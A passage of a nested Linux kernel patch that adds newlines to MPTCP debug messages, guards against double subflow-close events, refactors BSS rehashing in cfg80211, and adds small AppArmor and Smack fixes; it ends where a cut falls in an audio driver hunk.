+@@ -653,7 +653,7 @@ static bool __mptcp_move_skbs_from_subflow(struct mptcp_sock *msk,
+ 		}
+ 	}
+ 
+-	pr_debug("msk=%p ssk=%p", msk, ssk);
++	pr_debug("msk=%p ssk=%p\n", msk, ssk);
+ 	tp = tcp_sk(ssk);
+ 	do {
+ 		u32 map_remaining, offset;
+@@ -732,7 +732,7 @@ static bool __mptcp_ofo_queue(struct mptcp_sock *msk)
+ 	u64 end_seq;
+ 
+ 	p = rb_first(&msk->out_of_order_queue);
+-	pr_debug("msk=%p empty=%d", msk, RB_EMPTY_ROOT(&msk->out_of_order_queue));
++	pr_debug("msk=%p empty=%d\n", msk, RB_EMPTY_ROOT(&msk->out_of_order_queue));
+ 	while (p) {
+ 		skb = rb_to_skb(p);
+ 		if (after64(MPTCP_SKB_CB(skb)->map_seq, msk->ack_seq))
+@@ -754,7 +754,7 @@ static bool __mptcp_ofo_queue(struct mptcp_sock *msk)
+ 			int delta = msk->ack_seq - MPTCP_SKB_CB(skb)->map_seq;
+ 
+ 			/* skip overlapping data, if any */
+-			pr_debug("uncoalesced seq=%llx ack seq=%llx delta=%d",
++			pr_debug("uncoalesced seq=%llx ack seq=%llx delta=%d\n",
+ 				 MPTCP_SKB_CB(skb)->map_seq, msk->ack_seq,
+ 				 delta);
+ 			MPTCP_SKB_CB(skb)->offset += delta;
+@@ -1292,7 +1292,7 @@ static int mptcp_sendmsg_frag(struct sock *sk, struct sock *ssk,
+ 	size_t copy;
+ 	int i;
+ 
+-	pr_debug("msk=%p ssk=%p sending dfrag at seq=%llu len=%u already sent=%u",
++	pr_debug("msk=%p ssk=%p sending dfrag at seq=%llu len=%u already sent=%u\n",
+ 		 msk, ssk, dfrag->data_seq, dfrag->data_len, info->sent);
+ 
+ 	if (WARN_ON_ONCE(info->sent > info->limit ||
+@@ -1393,7 +1393,7 @@ static int mptcp_sendmsg_frag(struct sock *sk, struct sock *ssk,
+ 	mpext->use_map = 1;
+ 	mpext->dsn64 = 1;
+ 
+-	pr_debug("data_seq=%llu subflow_seq=%u data_len=%u dsn64=%d",
++	pr_debug("data_seq=%llu subflow_seq=%u data_len=%u dsn64=%d\n",
+ 		 mpext->data_seq, mpext->subflow_seq, mpext->data_len,
+ 		 mpext->dsn64);
+ 
+@@ -1870,7 +1870,7 @@ static int mptcp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 			if (!msk->first_pending)
+ 				WRITE_ONCE(msk->first_pending, dfrag);
+ 		}
+-		pr_debug("msk=%p dfrag at seq=%llu len=%u sent=%u new=%d", msk,
++		pr_debug("msk=%p dfrag at seq=%llu len=%u sent=%u new=%d\n", msk,
+ 			 dfrag->data_seq, dfrag->data_len, dfrag->already_sent,
+ 			 !dfrag_collapsed);
+ 
+@@ -2226,7 +2226,7 @@ static int mptcp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 			}
+ 		}
+ 
+-		pr_debug("block timeout %ld", timeo);
++		pr_debug("block timeout %ld\n", timeo);
+ 		sk_wait_data(sk, &timeo, NULL);
+ 	}
+ 
+@@ -2242,7 +2242,7 @@ static int mptcp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 		}
+ 	}
+ 
+-	pr_debug("msk=%p rx queue empty=%d:%d copied=%d",
++	pr_debug("msk=%p rx queue empty=%d:%d copied=%d\n",
+ 		 msk, skb_queue_empty_lockless(&sk->sk_receive_queue),
+ 		 skb_queue_empty(&msk->receive_queue), copied);
+ 	if (!(flags & MSG_PEEK))
+@@ -2503,6 +2503,12 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		     struct mptcp_subflow_context *subflow)
+ {
++	/* The first subflow can already be closed and still in the list */
++	if (subflow->close_event_done)
++		return;
++
++	subflow->close_event_done = true;
++
+ 	if (sk->sk_state == TCP_ESTABLISHED)
+ 		mptcp_event(MPTCP_EVENT_SUB_CLOSED, mptcp_sk(sk), ssk, GFP_KERNEL);
+ 
+@@ -2697,7 +2703,7 @@ static void mptcp_mp_fail_no_response(struct mptcp_sock *msk)
+ 	if (!ssk)
+ 		return;
+ 
+-	pr_debug("MP_FAIL doesn't respond, reset the subflow");
++	pr_debug("MP_FAIL doesn't respond, reset the subflow\n");
+ 
+ 	slow = lock_sock_fast(ssk);
+ 	mptcp_subflow_reset(ssk);
+@@ -2869,7 +2875,7 @@ void mptcp_subflow_shutdown(struct sock *sk, struct sock *ssk, int how)
+ 		break;
+ 	default:
+ 		if (__mptcp_check_fallback(mptcp_sk(sk))) {
+-			pr_debug("Fallback");
++			pr_debug("Fallback\n");
+ 			ssk->sk_shutdown |= how;
+ 			tcp_shutdown(ssk, how);
+ 
+@@ -2879,7 +2885,7 @@ void mptcp_subflow_shutdown(struct sock *sk, struct sock *ssk, int how)
+ 			WRITE_ONCE(mptcp_sk(sk)->snd_una, mptcp_sk(sk)->snd_nxt);
+ 			mptcp_schedule_work(sk);
+ 		} else {
+-			pr_debug("Sending DATA_FIN on subflow %p", ssk);
++			pr_debug("Sending DATA_FIN on subflow %p\n", ssk);
+ 			tcp_send_ack(ssk);
+ 			if (!mptcp_rtx_timer_pending(sk))
+ 				mptcp_reset_rtx_timer(sk);
+@@ -2922,7 +2928,7 @@ static void mptcp_check_send_data_fin(struct sock *sk)
+ 	struct mptcp_subflow_context *subflow;
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	pr_debug("msk=%p snd_data_fin_enable=%d pending=%d snd_nxt=%llu write_seq=%llu",
++	pr_debug("msk=%p snd_data_fin_enable=%d pending=%d snd_nxt=%llu write_seq=%llu\n",
+ 		 msk, msk->snd_data_fin_enable, !!mptcp_send_head(sk),
+ 		 msk->snd_nxt, msk->write_seq);
+ 
+@@ -2946,7 +2952,7 @@ static void __mptcp_wr_shutdown(struct sock *sk)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	pr_debug("msk=%p snd_data_fin_enable=%d shutdown=%x state=%d pending=%d",
++	pr_debug("msk=%p snd_data_fin_enable=%d shutdown=%x state=%d pending=%d\n",
+ 		 msk, msk->snd_data_fin_enable, sk->sk_shutdown, sk->sk_state,
+ 		 !!mptcp_send_head(sk));
+ 
+@@ -2961,7 +2967,7 @@ static void __mptcp_destroy_sock(struct sock *sk)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	might_sleep();
+ 
+@@ -3073,7 +3079,7 @@ bool __mptcp_close(struct sock *sk, long timeout)
+ 		inet_sk_state_store(sk, TCP_CLOSE);
+ 
+ 	sock_hold(sk);
+-	pr_debug("msk=%p state=%d", sk, sk->sk_state);
++	pr_debug("msk=%p state=%d\n", sk, sk->sk_state);
+ 	if (mptcp_sk(sk)->token)
+ 		mptcp_event(MPTCP_EVENT_CLOSED, msk, NULL, GFP_KERNEL);
+ 
+@@ -3331,12 +3337,12 @@ static struct sock *mptcp_accept(struct sock *sk, int flags, int *err,
+ 		return NULL;
+ 	}
+ 
+-	pr_debug("msk=%p, listener=%p", msk, mptcp_subflow_ctx(listener->sk));
++	pr_debug("msk=%p, listener=%p\n", msk, mptcp_subflow_ctx(listener->sk));
+ 	newsk = inet_csk_accept(listener->sk, flags, err, kern);
+ 	if (!newsk)
+ 		return NULL;
+ 
+-	pr_debug("msk=%p, subflow is mptcp=%d", msk, sk_is_mptcp(newsk));
++	pr_debug("msk=%p, subflow is mptcp=%d\n", msk, sk_is_mptcp(newsk));
+ 	if (sk_is_mptcp(newsk)) {
+ 		struct mptcp_subflow_context *subflow;
+ 		struct sock *new_mptcp_sock;
+@@ -3550,7 +3556,7 @@ static int mptcp_get_port(struct sock *sk, unsigned short snum)
+ 	struct socket *ssock;
+ 
+ 	ssock = msk->subflow;
+-	pr_debug("msk=%p, subflow=%p", msk, ssock);
++	pr_debug("msk=%p, subflow=%p\n", msk, ssock);
+ 	if (WARN_ON_ONCE(!ssock))
+ 		return -EINVAL;
+ 
+@@ -3568,7 +3574,7 @@ void mptcp_finish_connect(struct sock *ssk)
+ 	sk = subflow->conn;
+ 	msk = mptcp_sk(sk);
+ 
+-	pr_debug("msk=%p, token=%u", sk, subflow->token);
++	pr_debug("msk=%p, token=%u\n", sk, subflow->token);
+ 
+ 	mptcp_crypto_key_sha(subflow->remote_key, NULL, &ack_seq);
+ 	ack_seq++;
+@@ -3608,7 +3614,7 @@ bool mptcp_finish_join(struct sock *ssk)
+ 	struct sock *parent = (void *)msk;
+ 	bool ret = true;
+ 
+-	pr_debug("msk=%p, subflow=%p", msk, subflow);
++	pr_debug("msk=%p, subflow=%p\n", msk, subflow);
+ 
+ 	/* mptcp socket already closing? */
+ 	if (!mptcp_is_fully_established(parent)) {
+@@ -3653,7 +3659,7 @@ bool mptcp_finish_join(struct sock *ssk)
+ 
+ static void mptcp_shutdown(struct sock *sk, int how)
+ {
+-	pr_debug("sk=%p, how=%d", sk, how);
++	pr_debug("sk=%p, how=%d\n", sk, how);
+ 
+ 	if ((how & SEND_SHUTDOWN) && mptcp_close_state(sk))
+ 		__mptcp_wr_shutdown(sk);
+@@ -3854,7 +3860,7 @@ static int mptcp_listen(struct socket *sock, int backlog)
+ 	struct socket *ssock;
+ 	int err;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	lock_sock(sk);
+ 
+@@ -3889,7 +3895,7 @@ static int mptcp_stream_accept(struct socket *sock, struct socket *newsock,
+ 	struct socket *ssock;
+ 	int err;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	/* Buggy applications can call accept on socket states other then LISTEN
+ 	 * but no need to allocate the first subflow just to error out.
+@@ -3963,7 +3969,7 @@ static __poll_t mptcp_poll(struct file *file, struct socket *sock,
+ 	sock_poll_wait(file, sock, wait);
+ 
+ 	state = inet_sk_state_load(sk);
+-	pr_debug("msk=%p state=%d flags=%lx", msk, state, msk->flags);
++	pr_debug("msk=%p state=%d flags=%lx\n", msk, state, msk->flags);
+ 	if (state == TCP_LISTEN) {
+ 		struct socket *ssock = READ_ONCE(msk->subflow);
+ 
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index c3cd68edab779..ee3974b10ef05 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -479,7 +479,9 @@ struct mptcp_subflow_context {
+ 		can_ack : 1,        /* only after processing the remote a key */
+ 		disposable : 1,	    /* ctx can be free at ulp release time */
+ 		stale : 1,	    /* unable to snd/rcv data, do not use for xmit */
+-		valid_csum_seen : 1;        /* at least one csum validated */
++		valid_csum_seen : 1,        /* at least one csum validated */
++		close_event_done : 1,       /* has done the post-closed part */
++		__unused : 9;
+ 	enum mptcp_data_avail data_avail;
+ 	u32	remote_nonce;
+ 	u64	thmac;
+@@ -837,8 +839,6 @@ int mptcp_pm_announce_addr(struct mptcp_sock *msk,
+ 			   bool echo);
+ int mptcp_pm_remove_addr(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_list);
+ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list);
+-void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+-					struct list_head *rm_list);
+ 
+ void mptcp_free_local_addr_list(struct mptcp_sock *msk);
+ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info);
+@@ -975,7 +975,7 @@ static inline bool mptcp_check_fallback(const struct sock *sk)
+ static inline void __mptcp_do_fallback(struct mptcp_sock *msk)
+ {
+ 	if (test_bit(MPTCP_FALLBACK_DONE, &msk->flags)) {
+-		pr_debug("TCP fallback already done (msk=%p)", msk);
++		pr_debug("TCP fallback already done (msk=%p)\n", msk);
+ 		return;
+ 	}
+ 	set_bit(MPTCP_FALLBACK_DONE, &msk->flags);
+@@ -1002,7 +1002,7 @@ static inline void mptcp_do_fallback(struct sock *ssk)
+ 	}
+ }
+ 
+-#define pr_fallback(a) pr_debug("%s:fallback to TCP (msk=%p)", __func__, a)
++#define pr_fallback(a) pr_debug("%s:fallback to TCP (msk=%p)\n", __func__, a)
+ 
+ static inline bool mptcp_check_infinite_map(struct sk_buff *skb)
+ {
+diff --git a/net/mptcp/sockopt.c b/net/mptcp/sockopt.c
+index ff82fc062ae76..766797ace9426 100644
+--- a/net/mptcp/sockopt.c
++++ b/net/mptcp/sockopt.c
+@@ -881,7 +881,7 @@ int mptcp_setsockopt(struct sock *sk, int level, int optname,
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 	struct sock *ssk;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	if (level == SOL_SOCKET)
+ 		return mptcp_setsockopt_sol_socket(msk, optname, optval, optlen);
+@@ -1292,7 +1292,7 @@ int mptcp_getsockopt(struct sock *sk, int level, int optname,
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 	struct sock *ssk;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	/* @@ the meaning of setsockopt() when the socket is connected and
+ 	 * there are multiple subflows is not yet defined. It is up to the
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 1a92c8edd0a0e..dc3666298beff 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -39,7 +39,7 @@ static void subflow_req_destructor(struct request_sock *req)
+ {
+ 	struct mptcp_subflow_request_sock *subflow_req = mptcp_subflow_rsk(req);
+ 
+-	pr_debug("subflow_req=%p", subflow_req);
++	pr_debug("subflow_req=%p\n", subflow_req);
+ 
+ 	if (subflow_req->msk)
+ 		sock_put((struct sock *)subflow_req->msk);
+@@ -145,7 +145,7 @@ static int subflow_check_req(struct request_sock *req,
+ 	struct mptcp_options_received mp_opt;
+ 	bool opt_mp_capable, opt_mp_join;
+ 
+-	pr_debug("subflow_req=%p, listener=%p", subflow_req, listener);
++	pr_debug("subflow_req=%p, listener=%p\n", subflow_req, listener);
+ 
+ #ifdef CONFIG_TCP_MD5SIG
+ 	/* no MPTCP if MD5SIG is enabled on this socket or we may run out of
+@@ -218,7 +218,7 @@ static int subflow_check_req(struct request_sock *req,
+ 		}
+ 
+ 		if (subflow_use_different_sport(subflow_req->msk, sk_listener)) {
+-			pr_debug("syn inet_sport=%d %d",
++			pr_debug("syn inet_sport=%d %d\n",
+ 				 ntohs(inet_sk(sk_listener)->inet_sport),
+ 				 ntohs(inet_sk((struct sock *)subflow_req->msk)->inet_sport));
+ 			if (!mptcp_pm_sport_in_anno_list(subflow_req->msk, sk_listener)) {
+@@ -237,7 +237,7 @@ static int subflow_check_req(struct request_sock *req,
+ 				return -EPERM;
+ 		}
+ 
+-		pr_debug("token=%u, remote_nonce=%u msk=%p", subflow_req->token,
++		pr_debug("token=%u, remote_nonce=%u msk=%p\n", subflow_req->token,
+ 			 subflow_req->remote_nonce, subflow_req->msk);
+ 	}
+ 
+@@ -415,7 +415,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 	subflow->rel_write_seq = 1;
+ 	subflow->conn_finished = 1;
+ 	subflow->ssn_offset = TCP_SKB_CB(skb)->seq;
+-	pr_debug("subflow=%p synack seq=%x", subflow, subflow->ssn_offset);
++	pr_debug("subflow=%p synack seq=%x\n", subflow, subflow->ssn_offset);
+ 
+ 	mptcp_get_options(skb, &mp_opt);
+ 	if (subflow->request_mptcp) {
+@@ -434,7 +434,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 		subflow->mp_capable = 1;
+ 		subflow->can_ack = 1;
+ 		subflow->remote_key = mp_opt.sndr_key;
+-		pr_debug("subflow=%p, remote_key=%llu", subflow,
++		pr_debug("subflow=%p, remote_key=%llu\n", subflow,
+ 			 subflow->remote_key);
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPCAPABLEACTIVEACK);
+ 		mptcp_finish_connect(sk);
+@@ -451,7 +451,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 		subflow->thmac = mp_opt.thmac;
+ 		subflow->remote_nonce = mp_opt.nonce;
+ 		WRITE_ONCE(subflow->remote_id, mp_opt.join_id);
+-		pr_debug("subflow=%p, thmac=%llu, remote_nonce=%u backup=%d",
++		pr_debug("subflow=%p, thmac=%llu, remote_nonce=%u backup=%d\n",
+ 			 subflow, subflow->thmac, subflow->remote_nonce,
+ 			 subflow->backup);
+ 
+@@ -477,7 +477,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 			MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_JOINSYNACKBACKUPRX);
+ 
+ 		if (subflow_use_different_dport(mptcp_sk(parent), sk)) {
+-			pr_debug("synack inet_dport=%d %d",
++			pr_debug("synack inet_dport=%d %d\n",
+ 				 ntohs(inet_sk(sk)->inet_dport),
+ 				 ntohs(inet_sk(parent)->inet_dport));
+ 			MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_JOINPORTSYNACKRX);
+@@ -548,7 +548,7 @@ static int subflow_v4_conn_request(struct sock *sk, struct sk_buff *skb)
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(sk);
+ 
+-	pr_debug("subflow=%p", subflow);
++	pr_debug("subflow=%p\n", subflow);
+ 
+ 	/* Never answer to SYNs sent to broadcast or multicast */
+ 	if (skb_rtable(skb)->rt_flags & (RTCF_BROADCAST | RTCF_MULTICAST))
+@@ -579,7 +579,7 @@ static int subflow_v6_conn_request(struct sock *sk, struct sk_buff *skb)
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(sk);
+ 
+-	pr_debug("subflow=%p", subflow);
++	pr_debug("subflow=%p\n", subflow);
+ 
+ 	if (skb->protocol == htons(ETH_P_IP))
+ 		return subflow_v4_conn_request(sk, skb);
+@@ -697,7 +697,7 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 	struct mptcp_sock *owner;
+ 	struct sock *child;
+ 
+-	pr_debug("listener=%p, req=%p, conn=%p", listener, req, listener->conn);
++	pr_debug("listener=%p, req=%p, conn=%p\n", listener, req, listener->conn);
+ 
+ 	/* After child creation we must look for MPC even when options
+ 	 * are not parsed
+@@ -788,7 +788,7 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 			ctx->conn = (struct sock *)owner;
+ 
+ 			if (subflow_use_different_sport(owner, sk)) {
+-				pr_debug("ack inet_sport=%d %d",
++				pr_debug("ack inet_sport=%d %d\n",
+ 					 ntohs(inet_sk(sk)->inet_sport),
+ 					 ntohs(inet_sk((struct sock *)owner)->inet_sport));
+ 				if (!mptcp_pm_sport_in_anno_list(owner, sk)) {
+@@ -845,7 +845,7 @@ enum mapping_status {
+ 
+ static void dbg_bad_map(struct mptcp_subflow_context *subflow, u32 ssn)
+ {
+-	pr_debug("Bad mapping: ssn=%d map_seq=%d map_data_len=%d",
++	pr_debug("Bad mapping: ssn=%d map_seq=%d map_data_len=%d\n",
+ 		 ssn, subflow->map_subflow_seq, subflow->map_data_len);
+ }
+ 
+@@ -1005,7 +1005,7 @@ static enum mapping_status get_mapping_status(struct sock *ssk,
+ 
+ 	data_len = mpext->data_len;
+ 	if (data_len == 0) {
+-		pr_debug("infinite mapping received");
++		pr_debug("infinite mapping received\n");
+ 		MPTCP_INC_STATS(sock_net(ssk), MPTCP_MIB_INFINITEMAPRX);
+ 		subflow->map_data_len = 0;
+ 		return MAPPING_INVALID;
+@@ -1015,7 +1015,7 @@ static enum mapping_status get_mapping_status(struct sock *ssk,
+ 		if (data_len == 1) {
+ 			bool updated = mptcp_update_rcv_data_fin(msk, mpext->data_seq,
+ 								 mpext->dsn64);
+-			pr_debug("DATA_FIN with no payload seq=%llu", mpext->data_seq);
++			pr_debug("DATA_FIN with no payload seq=%llu\n", mpext->data_seq);
+ 			if (subflow->map_valid) {
+ 				/* A DATA_FIN might arrive in a DSS
+ 				 * option before the previous mapping
+@@ -1040,7 +1040,7 @@ static enum mapping_status get_mapping_status(struct sock *ssk,
+ 				data_fin_seq &= GENMASK_ULL(31, 0);
+ 
+ 			mptcp_update_rcv_data_fin(msk, data_fin_seq, mpext->dsn64);
+-			pr_debug("DATA_FIN with mapping seq=%llu dsn64=%d",
++			pr_debug("DATA_FIN with mapping seq=%llu dsn64=%d\n",
+ 				 data_fin_seq, mpext->dsn64);
+ 		}
+ 
+@@ -1087,7 +1087,7 @@ static enum mapping_status get_mapping_status(struct sock *ssk,
+ 	if (unlikely(subflow->map_csum_reqd != csum_reqd))
+ 		return MAPPING_INVALID;
+ 
+-	pr_debug("new map seq=%llu subflow_seq=%u data_len=%u csum=%d:%u",
++	pr_debug("new map seq=%llu subflow_seq=%u data_len=%u csum=%d:%u\n",
+ 		 subflow->map_seq, subflow->map_subflow_seq,
+ 		 subflow->map_data_len, subflow->map_csum_reqd,
+ 		 subflow->map_data_csum);
+@@ -1122,7 +1122,7 @@ static void mptcp_subflow_discard_data(struct sock *ssk, struct sk_buff *skb,
+ 	avail_len = skb->len - offset;
+ 	incr = limit >= avail_len ? avail_len + fin : limit;
+ 
+-	pr_debug("discarding=%d len=%d offset=%d seq=%d", incr, skb->len,
++	pr_debug("discarding=%d len=%d offset=%d seq=%d\n", incr, skb->len,
+ 		 offset, subflow->map_subflow_seq);
+ 	MPTCP_INC_STATS(sock_net(ssk), MPTCP_MIB_DUPDATA);
+ 	tcp_sk(ssk)->copied_seq += incr;
+@@ -1231,7 +1231,7 @@ static bool subflow_check_data_avail(struct sock *ssk)
+ 
+ 		old_ack = READ_ONCE(msk->ack_seq);
+ 		ack_seq = mptcp_subflow_get_mapped_dsn(subflow);
+-		pr_debug("msk ack_seq=%llx subflow ack_seq=%llx", old_ack,
++		pr_debug("msk ack_seq=%llx subflow ack_seq=%llx\n", old_ack,
+ 			 ack_seq);
+ 		if (unlikely(before64(ack_seq, old_ack))) {
+ 			mptcp_subflow_discard_data(ssk, skb, old_ack - ack_seq);
+@@ -1303,7 +1303,7 @@ bool mptcp_subflow_data_available(struct sock *sk)
+ 		subflow->map_valid = 0;
+ 		WRITE_ONCE(subflow->data_avail, MPTCP_SUBFLOW_NODATA);
+ 
+-		pr_debug("Done with mapping: seq=%u data_len=%u",
++		pr_debug("Done with mapping: seq=%u data_len=%u\n",
+ 			 subflow->map_subflow_seq,
+ 			 subflow->map_data_len);
+ 	}
+@@ -1403,7 +1403,7 @@ void mptcpv6_handle_mapped(struct sock *sk, bool mapped)
+ 
+ 	target = mapped ? &subflow_v6m_specific : subflow_default_af_ops(sk);
+ 
+-	pr_debug("subflow=%p family=%d ops=%p target=%p mapped=%d",
++	pr_debug("subflow=%p family=%d ops=%p target=%p mapped=%d\n",
+ 		 subflow, sk->sk_family, icsk->icsk_af_ops, target, mapped);
+ 
+ 	if (likely(icsk->icsk_af_ops == target))
+@@ -1497,7 +1497,7 @@ int __mptcp_subflow_connect(struct sock *sk, const struct mptcp_addr_info *loc,
+ 		goto failed;
+ 
+ 	mptcp_crypto_key_sha(subflow->remote_key, &remote_token, NULL);
+-	pr_debug("msk=%p remote_token=%u local_id=%d remote_id=%d", msk,
++	pr_debug("msk=%p remote_token=%u local_id=%d remote_id=%d\n", msk,
+ 		 remote_token, local_id, remote_id);
+ 	subflow->remote_token = remote_token;
+ 	WRITE_ONCE(subflow->remote_id, remote_id);
+@@ -1626,7 +1626,7 @@ int mptcp_subflow_create_socket(struct sock *sk, unsigned short family,
+ 	SOCK_INODE(sf)->i_gid = SOCK_INODE(sk->sk_socket)->i_gid;
+ 
+ 	subflow = mptcp_subflow_ctx(sf->sk);
+-	pr_debug("subflow=%p", subflow);
++	pr_debug("subflow=%p\n", subflow);
+ 
+ 	*new_sock = sf;
+ 	sock_hold(sk);
+@@ -1650,7 +1650,7 @@ static struct mptcp_subflow_context *subflow_create_ctx(struct sock *sk,
+ 	INIT_LIST_HEAD(&ctx->node);
+ 	INIT_LIST_HEAD(&ctx->delegated_node);
+ 
+-	pr_debug("subflow=%p", ctx);
++	pr_debug("subflow=%p\n", ctx);
+ 
+ 	ctx->tcp_sock = sk;
+ 	WRITE_ONCE(ctx->local_id, -1);
+@@ -1803,7 +1803,7 @@ static int subflow_ulp_init(struct sock *sk)
+ 		goto out;
+ 	}
+ 
+-	pr_debug("subflow=%p, family=%d", ctx, sk->sk_family);
++	pr_debug("subflow=%p, family=%d\n", ctx, sk->sk_family);
+ 
+ 	tp->is_mptcp = 1;
+ 	ctx->icsk_af_ops = icsk->icsk_af_ops;
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
+index 3cd162e53173b..d18716e5b2cc2 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -1534,7 +1534,7 @@ struct cfg80211_bss *cfg80211_get_bss(struct wiphy *wiphy,
+ }
+ EXPORT_SYMBOL(cfg80211_get_bss);
+ 
+-static void rb_insert_bss(struct cfg80211_registered_device *rdev,
++static bool rb_insert_bss(struct cfg80211_registered_device *rdev,
+ 			  struct cfg80211_internal_bss *bss)
+ {
+ 	struct rb_node **p = &rdev->bss_tree.rb_node;
+@@ -1550,7 +1550,7 @@ static void rb_insert_bss(struct cfg80211_registered_device *rdev,
+ 
+ 		if (WARN_ON(!cmp)) {
+ 			/* will sort of leak this BSS */
+-			return;
++			return false;
+ 		}
+ 
+ 		if (cmp < 0)
+@@ -1561,6 +1561,7 @@ static void rb_insert_bss(struct cfg80211_registered_device *rdev,
+ 
+ 	rb_link_node(&bss->rbn, parent, p);
+ 	rb_insert_color(&bss->rbn, &rdev->bss_tree);
++	return true;
+ }
+ 
+ static struct cfg80211_internal_bss *
+@@ -1587,6 +1588,34 @@ rb_find_bss(struct cfg80211_registered_device *rdev,
+ 	return NULL;
+ }
+ 
++static void cfg80211_insert_bss(struct cfg80211_registered_device *rdev,
++				struct cfg80211_internal_bss *bss)
++{
++	lockdep_assert_held(&rdev->bss_lock);
++
++	if (!rb_insert_bss(rdev, bss))
++		return;
++	list_add_tail(&bss->list, &rdev->bss_list);
++	rdev->bss_entries++;
++}
++
++static void cfg80211_rehash_bss(struct cfg80211_registered_device *rdev,
++                                struct cfg80211_internal_bss *bss)
++{
++	lockdep_assert_held(&rdev->bss_lock);
++
++	rb_erase(&bss->rbn, &rdev->bss_tree);
++	if (!rb_insert_bss(rdev, bss)) {
++		list_del(&bss->list);
++		if (!list_empty(&bss->hidden_list))
++			list_del_init(&bss->hidden_list);
++		if (!list_empty(&bss->pub.nontrans_list))
++			list_del_init(&bss->pub.nontrans_list);
++		rdev->bss_entries--;
++	}
++	rdev->bss_generation++;
++}
++
+ static bool cfg80211_combine_bsses(struct cfg80211_registered_device *rdev,
+ 				   struct cfg80211_internal_bss *new)
+ {
+@@ -1862,9 +1891,7 @@ cfg80211_bss_update(struct cfg80211_registered_device *rdev,
+ 			bss_ref_get(rdev, pbss);
+ 		}
+ 
+-		list_add_tail(&new->list, &rdev->bss_list);
+-		rdev->bss_entries++;
+-		rb_insert_bss(rdev, new);
++		cfg80211_insert_bss(rdev, new);
+ 		found = new;
+ 	}
+ 
+@@ -2651,10 +2678,7 @@ void cfg80211_update_assoc_bss_entry(struct wireless_dev *wdev,
+ 		if (!WARN_ON(!__cfg80211_unlink_bss(rdev, new)))
+ 			rdev->bss_generation++;
+ 	}
+-
+-	rb_erase(&cbss->rbn, &rdev->bss_tree);
+-	rb_insert_bss(rdev, cbss);
+-	rdev->bss_generation++;
++	cfg80211_rehash_bss(rdev, cbss);
+ 
+ 	list_for_each_entry_safe(nontrans_bss, tmp,
+ 				 &cbss->pub.nontrans_list,
+@@ -2662,9 +2686,7 @@ void cfg80211_update_assoc_bss_entry(struct wireless_dev *wdev,
+ 		bss = container_of(nontrans_bss,
+ 				   struct cfg80211_internal_bss, pub);
+ 		bss->pub.channel = chan;
+-		rb_erase(&bss->rbn, &rdev->bss_tree);
+-		rb_insert_bss(rdev, bss);
+-		rdev->bss_generation++;
++		cfg80211_rehash_bss(rdev, bss);
+ 	}
+ 
+ done:
+diff --git a/security/apparmor/apparmorfs.c b/security/apparmor/apparmorfs.c
+index 7160e7aa58b94..ce7b2f43c3193 100644
+--- a/security/apparmor/apparmorfs.c
++++ b/security/apparmor/apparmorfs.c
+@@ -1687,6 +1687,10 @@ int __aafs_profile_mkdir(struct aa_profile *profile, struct dentry *parent)
+ 		struct aa_profile *p;
+ 		p = aa_deref_parent(profile);
+ 		dent = prof_dir(p);
++		if (!dent) {
++			error = -ENOENT;
++			goto fail2;
++		}
+ 		/* adding to parent that previously didn't have children */
+ 		dent = aafs_create_dir("profiles", dent);
+ 		if (IS_ERR(dent))
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index b0a483e40c827..75b3e91d5a5f8 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -4290,7 +4290,7 @@ static int smack_inet_conn_request(const struct sock *sk, struct sk_buff *skb,
+ 	rcu_read_unlock();
+ 
+ 	if (hskp == NULL)
+-		rc = netlbl_req_setattr(req, &skp->smk_netlabel);
++		rc = netlbl_req_setattr(req, &ssp->smk_out->smk_netlabel);
+ 	else
+ 		netlbl_req_delattr(req);
+ 
+diff --git a/sound/pci/hda/hda_generic.c b/sound/pci/hda/hda_generic.c
+index dbf7aa88e0e31..992cf82da1024 100644
+--- a/sound/pci/hda/hda_generic.c
++++ b/sound/pci/hda/hda_generic.c
+@@ -4952,6 +4952,69 @@ void snd_hda_gen_stream_pm(struct hda_codec *codec, hda_nid_t nid, bool on)
+ }
